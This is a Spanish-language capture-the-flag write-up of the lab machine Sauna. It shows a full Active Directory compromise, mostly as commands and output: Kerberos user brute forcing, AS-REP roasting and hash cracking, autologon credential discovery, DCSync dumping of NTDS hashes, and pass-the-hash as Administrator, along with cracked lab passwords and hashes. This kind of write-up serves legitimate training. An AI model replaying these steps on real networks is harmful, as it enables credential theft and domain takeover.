Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos varios puertos abiertos, entre ellos el 80 que corre un servicio http
❯ nmap 10.10.10.175
Nmap scan report for 10.10.10.175
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49699/tcp open unknown
Con crackmapexec ademas del nombre de la maquina obtenemos su dominio
❯ crackmapexec smb 10.10.10.175
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
Para posibles proximos ataques o solo por comodidad lo agregamos al /etc/hosts
❯ echo "10.10.10.175 egotistical-bank.local" | sudo tee -a /etc/hosts
Podemos usar kerbrute con un diccionario de usuarios para enumerar posibles usuarios validos a través de fuerza bruta mediante kerberos, encontramos varios
❯ kerbrute userenum -d egotistical-bank.local --dc egotistical-bank.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/03/23 - Ronnie Flathers @ropnop
> Using KDC(s):
> egotistical-bank.local:88
> [+] VALID USERNAME: administrator@egotistical-bank.local
> [+] VALID USERNAME: hsmith@egotistical-bank.local
> [+] VALID USERNAME: sauna@egotistical-bank.local
> [+] VALID USERNAME: fsmith@egotistical-bank.local
Shell - fsmith
Con esta lista de usuarios podemos probar un ASREPRoast Attack para ver si algunos de los usuarios es vulnerable, fsmith lo es y nos devuelve su hash
❯ impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:3f439edff10b3b3e3d104edd8735a4ea$d377f9b8eb164f20997f4430f9ee72f8627f733e60cb75cba30ceeee0307c6a11acfe71c795b4e73ce878ef3df04e35ebccfaa6b5de6d8eccb337d73e16ccee7b562aeb7d2cf8d0b87738a24cc57e2082639cf85fb44171b2bb2cc3e27c9abee0ed685e24b013d2f2b46cf89856b360241751c5a9b87d6e04547f0f79dc5364cceeec3ff7a7e036892f18421d0d88b5e624cbefcef34d50eae666e085c5336ba76afc6284a286e2f72227692d39f015a0d2747a18c34de80c72692ad2357c1f42ae39fe45a5f7a121af8e44e81f775acaae1c55c836e58f3cdfb15619eb8dde22c4a30204a9ef2e00377033c8403c227627be4b475ca9940e284bc96d2cf08e9
[-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set
Podemos crackearlo con john y obtener la contraseña de fsmith en texto plano
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Al comprobarlas con crackmapexec podemos ver que son validas a nivel de smb, pero no solo eso tambien son validas para winrm por lo que podemos conectarnos
❯ crackmapexec smb egotistical-bank.local -u fsmith -p Thestrokes23
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
❯ crackmapexec winrm egotistical-bank.local -u fsmith -p Thestrokes23
SMB egotistical-bank.local 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP egotistical-bank.local 5985 SAUNA [*] http://egotistical-bank.local:5985/wsman
WINRM egotistical-bank.local 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
Nos conectamos haciendo uso de evil-winrm y podemos leer la primera flag
❯ evil-winrm -i egotistical-bank.local -u fsmith -p Thestrokes23
PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
PS C:\Users\FSmith\Documents> type ..\Desktop\user.txt
608**************************d4e
PS C:\Users\FSmith\Documents>
Shell - svc_loanmgr
Para buscar posibles formas de escañar subimos e importamos el modulo PowerUp
PS C:\Users\FSmith\Documents> upload PowerUp.ps1
Info: Uploading PowerUp.ps1 to C:\Users\FSmith\Documents\PowerUp.ps1
Data: 660436 bytes of 660436 bytes copied
Info: Upload successful!
PS C:\Users\FSmith\Documents> Import-Module .\PowerUp.ps1
PS C:\Users\FSmith\Documents>
Al invocar el modulo y empezara a probar algunas posibles formas de escalar, entre la información encontramos credenciales en el apartado de Autologon
PS C:\Users\FSmith\Documents> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
[*] Checking for vulnerable registry autoruns and configs...
[*] Checking for vulnerable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
PS C:\Users\FSmith\Documents>
Esto tambien podemos verlo con el comando reg con la query hacia winlogon
PS C:\Users\FSmith\Documents> reg query 'HKLM\software\microsoft\windows nt\currentversion\winlogon' | Select-String DefaultDomainName,DefaultUserName,DefaultPassword
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
PS C:\Users\FSmith\Documents>
Sin embargo al probarlas con crackmapexec estas no son validas a nivel de smb
❯ crackmapexec smb egotistical-bank.local -u svc_loanmanager -p Moneymakestheworldgoround!
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
Esto es porque el usuario svc_loanmanager no existe a nivel local ni de dominio, el usuario que podria ser valido es svc_loanmgr que es bastante parecido al original
PS C:\Users\FSmith\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
PS C:\Users\FSmith\Documents>
Comprobamos con crackmapexec con ese usuario y son validas para smb y winrm, podemos simplemente conectarnos con evil-winrm y obtener una shell
❯ crackmapexec smb egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
❯ crackmapexec winrm egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
SMB egotistical-bank.local 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP egotistical-bank.local 5985 SAUNA [*] http://egotistical-bank.local:5985/wsman
WINRM egotistical-bank.local 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
❯ evil-winrm -i egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
PS C:\Users\svc_loanmgr\Documents>
Shell - Administrator
Para enumerar la información y privilegios en el dominio subiremos el modulo SharpHound.ps1 con la función upload y lo importaremos en la powershell
PS C:\Users\svc_loanmgr\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc_loanmgr\Documents\SharpHound.ps1
Data: 1757460 bytes of 1757460 bytes copied
Info: Upload successful!
PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\svc_loanmgr\Documents>
Invocamos el modulo indicando que recolecte toda la información del dominio, al hacerlo nos creara un zip con esta que podemos descargar usando download
PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All
PS C:\Users\svc_loanmgr\Documents> dir
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2023 2:46 AM 11545 20230504024616_BloodHound.zip
-a---- 5/4/2023 2:43 AM 1318097 SharpHound.ps1
PS C:\Users\svc_loanmgr\Documents> download 20230504024616_BloodHound.zip BH.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20230504024616_BloodHound.zip to BH.zip
Info: Download successful!
PS C:\Users\svc_loanmgr\Documents>
Subimos el zip a bloodhound y listando los usuarios que pueden hacer un DCSync encontramos al usuario svc_loanmgr del cual ya tenemos sus credenciales
Hay varias formas pero podemos simplemente hacerlo con crackmapexec como el usuario svc_loanmgr para dumpear el ntds.dit mediante el metodo drsuapi
❯ crackmapexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! --ntds drsuapi
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
SMB 10.10.10.175 445 SAUNA [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.175 445 SAUNA [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.175 445 SAUNA Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
SMB 10.10.10.175 445 SAUNA Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.175 445 SAUNA krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SMB 10.10.10.175 445 SAUNA SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:020b966fa703e1eee69c12de71a6874b:::
Finalmente podemos usar el listado de hash del usuario Administrator para mediante un passthehash conectarnos con evil-winrm para poder leer la flag
❯ evil-winrm -i egotistical-bank.local -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
265**************************fa3
PS C:\Users\Administrator\Documents>
